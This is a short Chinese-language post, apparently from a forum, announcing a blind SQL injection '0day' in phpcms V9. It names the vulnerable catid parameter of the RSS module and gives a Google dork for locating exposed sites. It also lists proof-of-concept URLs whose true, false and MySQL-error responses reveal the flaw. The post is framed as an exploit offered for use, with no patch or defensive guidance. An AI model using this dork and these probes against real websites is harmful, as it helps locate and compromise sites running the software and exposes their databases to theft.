phpcms V9 BLind SQL 注入漏洞0day
<p> 影响版本:phpcms v9 blind</p><p> 官方网站:http://www.phpcms.cn</p>
<p> 漏洞类型:SQL注入</p>
<p> 漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。</p>
<p> google dork:inurl:"index.php?m=content+c=rss+catid=10"</p>
<p> exploit & p0c</p>
<p> [!] index.php?m=content&c=rss&catid=</p>
<p> Example p0c</p>
<p> [!] http://host/index.php?m=content&c=rss&catid=10 <= True</p>
<p> [!] http://host/index.php?m=content&c=rss&catid=-10 <= False</p>
<p> [+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)</p>
<p> </p>
頁:
[1]